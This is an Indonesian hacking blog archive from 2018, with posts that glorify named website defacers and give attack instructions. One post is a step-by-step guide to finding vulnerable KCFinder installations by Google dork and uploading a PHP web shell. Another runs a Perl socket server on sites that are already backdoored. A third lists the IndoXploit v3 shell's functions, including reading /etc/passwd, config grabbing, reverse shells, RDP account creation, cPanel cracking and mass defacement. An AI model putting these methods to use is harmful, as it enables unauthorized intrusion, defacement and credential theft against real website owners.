Friday, 20 April 2018

4 Defacer Indonesia Yang Ditakuti Dunia



4 Defacer Indonesia Yang Di Takuti Dunia

Defacer pada umumnya adalah orang iseng yang sedang ingin mencoba mencari tau baik dari segi ilmu, kemampuan, dan jati diri. Kebiasaan yang mudah diketahui dari mereka adalah mereka gemar merubah tampilan utama website, menggunakan/ memanfaatkan kelemahan/ kecacatan dalam sebuah program. Defacer umumnya tidak begitu memahami tentang level pemrograman, mereka lebih cenderung memahami tenyang kinerja sebuah webserver beserta script yang ada di dalamnya.

 1. 4prili666h05T



4prili666h05T juga tidak pernah diketahui identitasnya secara lengkap, ada beberapa data tentang dirinya tapi tetap masih dalam wilayah abu abu dan tanpa bukti yang kuat, 4prili666h05T adalah pendiri dari team Hacker PhantomGhost, PhantomGhost sendiri adalah team hacker yang sering meretas website website pemerintah untuk menyuarakan Demo kepada pemerintah, terpisah dari PhantomGhost, 4prili666h05T pernah meretas perusahaan perusahaan besar seperti Mcdonalds, KIA, IBM, McAfee dan masih banyak lagi, dan yang paling booming adalah pada saat meretas lebih dari 2000 website israel dalam satu hari pada tahun 2014.
Bersama dengan team Hacker Dunia AnonSec, 4prili666h05T pernah menyebarkan data rahasia FBI ke publik, dan pernah membuat bingung NASA karena dia juga pernah mencuri salah satu Drone NASA dan mengambil semua data data rahasia dari Drone tersebut.
Ada yang mengatakan kalo 4prili666h05T sering muncul ke permukaan dan saling sapa dengan teman temannya didunia maya, tapi dengan sering berubah ubahnya nama dan data yang dia gunakan, sangat sulit untuk melacak keberadaan sebenarnya dari hacker tersebut.
Jika pemerintah Indonesia jeli akan perkembangan dunia teknologi informatika, sebenarnya banyak ahli atau pakar IT dan komputer di Tanah Air yang memiliki kemampuan atau keahlian di atas rata-rata. Namun sayangnya, banyak di antara mereka belum terekspos dan diberdayakan. 
4prili666h05T ini baru saja meretas website Donald Trump Show kalian bisa melihat hasil deface nya di Mirror ini : http://www.zone-h.org/mirror/id/27179765

2. Hmei7



Hmei7 sempat membuat heboh karena berhasil mengacak-acak situs blogging, Wordpress, beberapa bulan lalu. Tidak hanya Wordpress, menurut catatan di situs Zone-H, Hmei7 telah meretas (deface) ribuan situs di dunia.
Bahkan, eHacking News, pernah mengulas bahwa dia juga berhasil melumpuhkan lebih dari 5000 website di seluruh dunia hanya dalam waktu 2 hari saja. Karena ulahnya itu, Hmei7 dikenal sebagai Mass Defacer dunia.
Namun, siapakah sosok asli dibalik inisial Hmei7 ini?
Sampai sekarang informasi mengenai hacker satu ini masih simpang siur. Bahkan, Softpedia berhasil mewawancarai seseorang yang mengklaim dirinya adalah Hmei7 (asli), namun ternyata (menurut pihak Softpedia) bukan.
Bahkan ada sebuah blog dengan nama hmei7.blogspot.com. Sayangnya, blog satu ini juga belum dapat dijadikan sebagai bukti sebagai milik dari sang defacer tersebut.
Dari banyaknya data yang beredar di internet, Hmei7 adalah seorang anak kuliahan (mungkin sudah lulus sekarang ini) di salah satu universitas negeri di Malang, Jawa Timur. Background pendidikan di perkuliahannya adalah Diskomvis.
Kabarnya, dia mulai aktif di dunia hacking sejak tahun 2001 silam. Selain di forum-forum, Hmei7 juga kerap hadir di wahana chatting mIRC dengan nick name berbeda.
Selain di mIRC, dia juga sering muncul di Yahoo!Chat Group serta forum-forum yang berhubungan dengan cyber dan teknologi. Dari situlah, Hmei7 mulai belajar banyak dengan mempelajari tutorial, bertanya langsung ke para peretas senior atau juga melakukan praktik langsung.
Setelah mempunyai 'cukup ilmu,' Hmei7 mencoba bergerilya secara luas dan situs pertama yang berhasil dia lumpuhkan adalah website milik IBM.
Menurut Softpedia, dalam dan setelah melakukan aksinya, Hmei7 memang mengetahui banyak ID dan password di situs yang diserangnya, namun dia tidak ingin mempublikasikan atau menggunakannya. Dia hanya senang melakukan deface dan memajang namanya di halaman utama situs yang bersangkutan.
Menurut data dari Zone-H, sampai sekarang, sudah ada ratusan ribu situs dan blog yang berhasil dia lumpuhkan atau juga dia ganti tampilan depannya. Bahkan dia sempat menduduki peringkat 1 dunia sebagai hacker (defacer) menurut peringkat di Zone-H http://www.zone-h.org/archive/notifier=Hmei7

3. Mr.spongebob


Mr.spongebob adalah salah satu kelompok hacker yang terbilang hebat dari teamMedan Cyber Team, dia beberapa hari ini telah men deface site Nepal / .np kalian bisa melihat Mirror si Mr.spongebob ini di : http://www.zone-h.org/archive/notifier=mr.spongebob (zone-h adalah salah satu website yang menyediakan data - data / mirror hasil deface suatu website yang telah di serang oleh sejumlah hacker / defacer ) 

4. XsvsHacker


Seperti halnya Hmei7, seorang peretas handal dari Tanah Air lainnya, berinisial XsvsHacker juga pernah melakukan aksi yang membuat banyak pemilik website kelabakan, seperti meretas database NYPD di tahun 2011, melakukandefacing lebih dari 430 ribu situs di seluruh dunia, meretas database game Zynga sampai dengan membobol server situs kepresidenan Israel.
Walaupun identitas asli XsvsHacker belum diketahui sampai sekarang, namun pihak FBI terus mencarinya dari tahun 2011 hingga kini karena telah mengambil data-data penting di server CIA dan NYPD.
XsvsHacker adalah salah satu anggota hacktivist terkenal dunia, Anonymous, yang kabarnya bernama asli Sandy Afrian. Akan tetapi, kebenaran mengenai namanya tersebut masih menjadi simpang siur.

Wednesday, 11 April 2018

Cara Deface Kcfinder Upload Shell

Hello guys, gimana kabarnya? Sehat Kan? Kapan Mati Goblok >:(
Kali ini w Admin Paduka Tamvan mau post Tutorial Deface Kcfinder Upload Shell ok


POC ini Poc Up Shell pertama yang gw bisa dan di ajarin oleh tmen saya Z-I SLOW :v

BAHAN =
- Dork : inurl:/modules/kcfinder/
- Exploit : www.target.com/[path]/modules/kcfinder/upload.php
- CSRF : Don't Kill Me,I Have A Cat :(
- Kopi
- Nekopoi.band

STEP BY STEP :

  1. Dorking di google
  2. Masukin exploit www.target.com/modules/kcfinder/upload.php
  3. Kalau blank dan muncul alert "unknow error" berartu vuln y, lanjut pergi ke CSRF. Masukin link target kamu di bagian URL, dibagian Post File isi " Filedata "
  4. Klik kunci target, setelah itu upload shell kalian dengan extensi .php.acc.db atau .php5
  5. Akses shell kalian 
  6. www.target.com/modules/kcfiner/upload/file/shell.php5

Sekian terimakasih :) SEMOGA KECYDUK LU KIMAK >:(

Sunday, 8 April 2018

Website Kominfo Purworejo Diretas Hacker

Hai Agan"....
Jika kalian mengunjungi website http://kominfo.purworejokab.go.id kalian akan melihat tampilan yang berbeda dari website itu, karena saat post ini dibuat website itu dalam keadaan terdeface oleh hacker yang mempunya kode nama ./ANARKI-420.. Sang hacker hanya menyisipkan pesan "Semakin dirimu mengejek ku, semakin termotivasi pula diriku untuk menghancurkan dirimu" entah apa maksud sang peretas. ./ANARKI-420 Adalah anggota dari Team hacker Sora Cyber Team yang saat dulu pernah meretas website Indosat.

Friday, 6 April 2018

Tutorial Socket Server With Perl

# Post By Mc'Sl0vv

Hai gan selamat sore, malam, siang, pagi:v
dipost ini ane mau kasih tutor socket server nih... socket server ini bisa dibilang mudah gan, kalo disite tuh biasanya kan ada domain lagi yang bisa disymlink atau jumping nah kalo socket server ini kamu gak perlu ribet symlink atau jumping..
ok, langsung aja siapin bahan nya:

~ Script socket server, KLIK DISINI
~ Web yang sudah tertanam shell backdoor dengan Perl ON (liat dibawah)


(edit scriptnya pake nick agan)
Langsung aja ke tutornya...
upload dulu script socket servernya... disini script perl punya ane adalah myport,pl


Jika sudah, ke command...


masukin command pertama:

perl myport.pl


lalu enter
(myport.pl itu nama script ane, kalau punya agan beda ganti aja jadi namascriptagan.pl)

dan masukin command kedua:

ps aux | grep 'perl'



lalu enter...
jika keluar seperti ini...


ada perl myport.pl berarti berhasil...
sekarang saatnya coba buka port yang sudah ditentukan.. kalu di script port ane portnya adalah 1999, jadi nanti cara ceknya adalah http://site.com:1999
saatnya cek berhasil atau tidak..


Yaa.... BERHASIL!!
cara lihat web mana saja yang kena tinggal reverse ip saja (klik disini)


nah dibawah ini adalah web yang kena socket servernya


Sampai sini saja tutorialnya... tunggu post selanjutnya dari ane:D
mohon maaf bila kurang jelas

Spesial Thanks For IndoXploit
Refrensi By IndoXploit

Tutorial Video:

Saturday, 31 March 2018

Tingkatan-tingkatan Hacker menurut keahliannya

Author : Anonimokerl

Hae!1!1!1 Berjumpa lagi dengan mimin yang tamvan. Kali ini mimin akan membahas tingkatan-tingkatan seorang hacker menurut keahliannya.


Okey, langsung simak aja tingkatan-tingkatan seorang hacker menurut keahliannya :
  • Lamer 
Lamer adalah orang tanpa pengalaman & pengetahuan yang ingin menjadi Hacker (wanna-be Hacker). Biasanya mereka ingin menjadi hacker karena terinspirasi dari suatu berita ataupun dari suatu film, seperti film who am i. 
  • Script Kiddie
Seperti juga Lamer, pada level ini mereka hanya mempunyai pengetahuan teknis networking yang sangat minimal. Biasanya mereka melakukan hacking dengan memakai tools yang sudah ada.
  • Hacking Group
Hacking Group adalah kumpulan orang yang memiliki visi misi yang sama, biasanya mereka bertemu di media sosial dan membuat suatu kelompok atau organisasi. 
  • Hacktivist
Hacktivist merupakan kumpulan hacker yang memiliki level lebih tinggi dengan tujuan yang sama. Biasanya, ada pesan politis atau sosial di balik aktivitas meretas mereka. Salah satu hacktivist yang paling dikenal adalah Anonymous yang memiliki anggota dari berbagai belahan dunia.
  • BlackHat
BlackHat adalah istilah teknologi informasi dalam yang mengacu kepada para peretas yang menerobos keamanan sistem komputer tanpa izin, umumnya dengan maksud untuk mengakses komputer-komputer yang terkoneksi ke jaringan tersebut.
  • White Hat
White Hat adalah istilah teknologi informasi yang mengacu kepada peretas yang secara etis menunjukkan suatu kelemahan dalam sebuah sistem komputer.
  • Organized Criminal Gangs
Memasuki level hacker yang berbahaya, tersebutlah Organized Criminal Gangs. Sesuai dengan namanya, hacker-hacker ini tidak hanya sebagai seorang peretas, tapi juga gangster yang bernaung dalam organisasi kriminal. Nggak ada orang cupu di sini. Semuanya adalah hacker-hacker pilihan dengan kemampuan yang sangat tinggi. Dengan aksi yang sangat sulit dideteksi, geng peretas ini akan dengan mudah melewati pantauan pihak keamanan dalam melakukan kejahatannya.
  • Nation States
Masuk ke level yang lebih tinggi, terdapat Nation States, yaitu hacker yang mengincar infrastruktur penting, seperti data-data milik pemerintah, publik, finansial, hingga militer. Mereka juga punya senjata berupa virus yang bisa bikin korbannya kalang kabut. Salah satu contoh kegiatan Nation States adalah serangan ke database milik pemerintah Iran dengan memakai virus Flame di tahun 2012 silam.


Itulah beberapa tingkatan hacker menurut keahliannya.

Saturday, 10 February 2018

SHELL IndoXploit v3

Yooo whatsapp guys,kali ini saya akan membagikan Shell IndoXploit
Ini dia feature nya
=============================================
**** COMMAND BASED *****
- Read File
usage: rf [filename]
example: rf /etc/passwd
- Spawn File/Tools
usage: spawn [name]
[name]
- Adminer (adminer)
- WebConsole (webconsole)
- CGI Telnet 1 (cgitelnet1)
- CGI Telnet 2 (cgitelnet2)
- PHPINFO (phpinfo)
example:
spawn adminer
spawn webconsole
spawn cgitelnet1
- Jumping
usage: jumping
- Config Grabber
usage: idxconfig
- Symlink
usage: symlink
- Reverse Shell
[Back Connect]
usage: rvr bc [IP] [PORT] [TYPE]
example:
rvr bc 127.0.0.1 1337 bash
rvr bc 127.0.0.1 1337 perl
[Bind Port]
usage: rvr bp [PORT] [TYPE]
example:
rvr bp 1337 perl
- KRDP - Create RDP Account (for windows server only)
usage: krdp
- Logout From Shell
usage: logout
- Kill Backdoor
usage: killme
=============================================
- Mass Password Change
- Fake Root
- Cpanel Crack
- Mass Deface/Delete File
- Zone-H Mass Submit
Sekian post saya,maaf kalo berantakan :v